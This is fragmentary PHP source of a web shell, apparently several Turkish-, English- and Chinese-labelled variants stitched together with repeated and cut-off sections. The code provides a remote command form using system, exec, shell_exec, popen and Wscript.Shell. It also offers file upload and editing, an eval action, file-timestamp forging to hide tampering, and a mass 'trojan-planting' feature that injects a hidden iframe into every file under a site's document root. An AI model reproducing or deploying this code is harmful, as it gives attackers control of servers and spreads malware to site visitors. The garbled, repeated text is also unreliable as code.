$dir = $_post['dir']; $nowpath = getPath($pathname, $dir); } /////// $dir_writeable = dir_writeable($nowpath) ? "m" : "mm"; $phpinfo = !eregi("phpinfo", $dis_func) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : ""; $reg = substr(PHP_OS, 0, 3) == 'WIN' ? " | <a href=\"?action=reg\"mohajer22</a>" : ""; $tb = new FORMS(); $tb->tableheader(); $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>' . $_SERVER['HTTP_HOST'] . '</b></td><td><b>' . $mohajer . '</b></td><td align="right"><b>' . $_SERVER['REMOTE_ADDR'] . '</b></td></tr></table>', 'center', 'top'); $tb->tdbody("<FORM method='POST' action='{$REQUEST_URI}' enctype='multipart/form-data'><INPUT type='submit' name='Rifrish' value=' dir ' id=input><INPUT type='submit'name='erne' value='erne ' id=input><INPUT type='submit' name='phpinfo' value='PHPinfo' id=input><INPUT type='submit' name='shell' value='command shill' id=input></form>"); $tb->tablefooter(); $tb->tableheader(); $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Dosya Duzenle Yada Olustur & Dosya Yukle & Dizin Olustur</b></td></tr></table>', 'center', 'top'); $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>'); $tb->headerform(array('content' => '<FONT COLOR=#9C9C9C>Dosya Duzenle weya Olustur:</FONT>' . $tb->makehidden('dir', getcwd()) . ' ' . $tb->makeinput('editfile') . ' ' . $tb->makeinput('Edit', 'Duzenle', '', 'submit'))); $tb->headerform(array('action' => '?dir=' . urlencode($dir), 'enctype' => 'multipart/form-data', 'content' => '<FONT COLOR=#9C9C9C>Dosya Yukle:</FONT>' . $tb->makeinput('uploadfile', '', '', 'file') . ' ' . $tb->makeinput('doupfile', 'Ekle', '', 'submit') . $tb->makeinput('uploaddir', $dir, '', 'hidden'))); $tb->headerform(array('content' => '<FONT COLOR=#9C9C9C>Dizin Olustur:</FONT> ' . $tb->makeinput('newdirectory') . ' ' . $tb->makeinput('createdirectory', 'yenidizin', '', 'submit'))); $execfuncs = substr(PHP_OS, 0, 3) == 'WIN' ? array('system' => 'system', 'passthru' => 'passthru', 'exec' => 'exec', 'shell_exec' => 'shell_exec', 'popen' => 'popen', 'wscript' => 'Wscript.Shell') : array('system' => 'system', 'passthru' => 'passthru', 'exec' => 'exec', 'shell_exec' => 'shell_exec', 'popen' => 'popen'); $tb->headerform(array('content' => '<FONT COLOR=#9C9C9C>cmd:</FONT>' . $tb->makeselect(array('name' => 'execfunc', 'option' => $execfuncs, 'selected' => $execfunc)) . ' ' . $tb->makeinput('command') . ' ' . $tb->makeinput('Run', 'command', '', 'submit'))); $tb->tdbody("</td></tr></table>"); if (!isset($_GET['action']) or empty($_GET['action']) or $_GET['action'] == "dir") { $tb->tableheader(); echo "<tr bgcolor='#D0D0D0'><td align='center' nowrap width='27%'><b>DIR</b></td><td align='center' nowrap width='16%'><b>First data</b></td><td align='center' nowrap width='16%'><b>Last data</b></td><td align='center' nowrap width='11%'><b>Size</b></td><td align='center' nowrap width='6%'><b>Perm</b></td></tr>"; $dirs = @opendir($dir); $dir_i = '0'; while ($file = @readdir($dirs)) { $filepath = "{$dir}/{$file}"; $a = @is_dir($filepath); if ($a == "1") { if ($file != ".." && $file != ".") {
if (empty($newfile)) { $filename = "{$dir}/{$editfile}"; $fp = @fopen($filename, "r"); $contents = @fread($fp, filesize($filename)); @fclose($fp); $contents = htmlspecialchars($contents); } else { $editfile = $newfile; $filename = "{$dir}/{$editfile}"; } $action = "?dir=" . urlencode($dir) . "&editfile=" . $editfile; $tb->tableheader(); $tb->formheader($action, '新建/编辑文件'); $tb->tdbody('当前文件: ' . $tb->makeinput('editfilename', $filename) . ' 输入新文件名则建立新文件'); $tb->tdbody($tb->maketextarea('filecontent', $contents)); $tb->makehidden('do', 'doeditfile'); $tb->formfooter('1', '30'); } elseif ($_GET['action'] == "rename") { $nowfile = isset($_POST['newname']) ? $_POST['newname'] : basename($_GET['fname']); $action = "?dir=" . urlencode($dir) . "&fname=" . urlencode($fname); $tb->tableheader(); $tb->formheader($action, '修改文件名'); $tb->makehidden('oldname', $dir . "/" . $nowfile); $tb->makehidden('dir', $dir); $tb->tdbody('当前文件名: ' . basename($nowfile)); $tb->tdbody('改名为: ' . $tb->makeinput('newname')); $tb->makehidden('do', 'rename'); $tb->formfooter('1', '30'); } elseif ($_GET['action'] == "fileperm") { $action = "?dir=" . urlencode($dir) . "&file=" . $file; $tb->tableheader();
echo "鼠标移到结果文件上会有部分截取显示."; } echo "</span><br><hr width=\"775\" noshade>"; find($path); } else { echo "你要查虾米?到底要查虾米呢?有没有虾米要你查呢?"; } } elseif ($_GET['action'] == 'plgmok') { dirtree($_POST['dir'], $_POST['mm']); } elseif ($_GET['action'] == "plgm") { $action = '?action=plgmok'; $gm = "<iframe src=http://127.0.0.1/m.htm width=0 height=0></iframe>"; $tb->tableheader(); $tb->formheader($action, '批量挂马'); $tb->tdbody('网站批量挂马程序php版', 'center'); $tb->tdbody('文件位置: ' . $tb->makeinput('dir', '' . $_SERVER["DOCUMENT_ROOT"] . '', '', 'text', '60') . '<br>要挂代码:' . $tb->maketextarea('mm', $gm, '50', '5') . '' . $tb->makehidden('do', '批量挂马') . '<br>' . $tb->makeinput('submit', '开始挂马', '', 'submit'), 'center', '1', '35'); echo "</form>"; $tb->tablefooter(); } elseif ($_POST['do'] == 'domodtime') { if (!@file_exists($_POST['curfile'])) { echo "要修改的文件不存在!"; } else { if (!@file_exists($_POST['tarfile'])) { echo "要参照的文件不存在!"; } else { $time = @filemtime($_POST['tarfile']); echo @touch($_POST['curfile'], $time, $time) ? basename($_POST['curfile']) . " 的修改时间成功改为 " . date("Y-m-d H:i:s", $time) . " !" : "文件的修改时间修改失败!"; } } } elseif ($_POST['do'] == 'modmytime') { if (!@file_exists($_POST['curfile'])) {
$dir = $_post['dir']; $nowpath = getPath($pathname, $dir); } /////// $dir_writeable = dir_writeable($nowpath) ? "m" : "mm"; $phpinfo = !eregi("phpinfo", $dis_func) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : ""; $reg = substr(PHP_OS, 0, 3) == 'WIN' ? " | <a href=\"?action=reg\"mohajer22</a>" : ""; $tb = new FORMS(); $tb->tableheader(); $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>' . $_SERVER['HTTP_HOST'] . '</b></td><td><b>' . $mohajer . '</b></td><td align="right"><b>' . $_SERVER['REMOTE_ADDR'] . '</b></td></tr></table>', 'center', 'top'); $tb->tdbody("<FORM method='POST' action='{$REQUEST_URI}' enctype='multipart/form-data'><INPUT type='submit' name='Rifrish' value=' dir ' id=input><INPUT type='submit'name='TrYaG' value='TrYaG Team' id=input><INPUT type='submit' name='phpinfo' value='PHPinfo' id=input><INPUT type='submit' name='shell' value='command shill' id=input></form>"); $tb->tablefooter(); $tb->tableheader(); $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Editfile or make & Uploud file & Make directory</b></td></tr></table>', 'center', 'top'); $tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>'); $tb->headerform(array('content' => '<FONT COLOR=RED>File to edit or make:</FONT>' . $tb->makehidden('dir', getcwd()) . ' ' . $tb->makeinput('editfile') . ' ' . $tb->makeinput('Edit', 'editfile', '', 'submit'))); $tb->headerform(array('action' => '?dir=' . urlencode($dir), 'enctype' => 'multipart/form-data', 'content' => '<FONT COLOR=RED>Uploud file:</FONT>' . $tb->makeinput('uploadfile', '', '', 'file') . ' ' . $tb->makeinput('doupfile', 'up', '', 'submit') . $tb->makeinput('uploaddir', $dir, '', 'hidden'))); $tb->headerform(array('content' => '<FONT COLOR=RED>Make directory:</FONT> ' . $tb->makeinput('newdirectory') . ' ' . $tb->makeinput('createdirectory', 'newdirectory', '', 'submit'))); $execfuncs = substr(PHP_OS, 0, 3) == 'WIN' ? array('system' => 'system', 'passthru' => 'passthru', 'exec' => 'exec', 'shell_exec' => 'shell_exec', 'popen' => 'popen', 'wscript' => 'Wscript.Shell') : array('system' => 'system', 'passthru' => 'passthru', 'exec' => 'exec', 'shell_exec' => 'shell_exec', 'popen' => 'popen'); $tb->headerform(array('content' => '<FONT COLOR=RED>cmd:</FONT>' . $tb->makeselect(array('name' => 'execfunc', 'option' => $execfuncs, 'selected' => $execfunc)) . ' ' . $tb->makeinput('command') . ' ' . $tb->makeinput('Run', 'command', '', 'submit'))); $tb->tdbody("</td></tr></table>"); if (!isset($_GET['action']) or empty($_GET['action']) or $_GET['action'] == "dir") { $tb->tableheader(); echo "<tr bgcolor='#AA0000'><td align='center' nowrap width='27%'><b>DIR</b></td><td align='center' nowrap width='16%'><b>First data</b></td><td align='center' nowrap width='16%'><b>Last data</b></td><td align='center' nowrap width='11%'><b>Size</b></td><td align='center' nowrap width='6%'><b>Perm</b></td></tr>"; $dirs = @opendir($dir); $dir_i = '0'; while ($file = @readdir($dirs)) { $filepath = "{$dir}/{$file}"; $a = @is_dir($filepath); if ($a == "1") { if ($file != ".." && $file != ".") {
if (empty($newfile)) { $filename = "{$dir}/{$editfile}"; $fp = @fopen($filename, "r"); $contents = @fread($fp, filesize($filename)); @fclose($fp); $contents = htmlspecialchars($contents); } else { $editfile = $newfile; $filename = "{$dir}/{$editfile}"; } $action = "?dir=" . urlencode($dir) . "&editfile=" . $editfile; $tb->tableheader(); $tb->formheader($action, '新建/编辑文件'); $tb->tdbody('当前文件: ' . $tb->makeinput('editfilename', $filename) . ' 输入新文件名则建立新文件 Php代码加密: <input type="checkbox" name="change" value="yes" onclick="javascript:alert(\'这个功能只可以用来加密或是压缩完整的php代码。\\n\\n非php代码或不完整php代码或不支持gzinflate函数请不要使用!\')"> '); $tb->tdbody($tb->maketextarea('filecontent', $contents)); $tb->makehidden('do', 'doeditfile'); $tb->formfooter('1', '30'); } elseif ($_GET['action'] == "rename") { $nowfile = isset($_POST['newname']) ? $_POST['newname'] : basename($_GET['fname']); $action = "?dir=" . urlencode($dir) . "&fname=" . urlencode($fname); $tb->tableheader(); $tb->formheader($action, '修改文件名'); $tb->makehidden('oldname', $dir . "/" . $nowfile); $tb->makehidden('dir', $dir); $tb->tdbody('当前文件名: ' . basename($nowfile)); $tb->tdbody('改名为: ' . $tb->makeinput('newname')); $tb->makehidden('do', 'rename'); $tb->formfooter('1', '30'); } elseif ($_GET['action'] == "eval") { $action = "?dir=" . urlencode($dir) . ""; $tb->tableheader();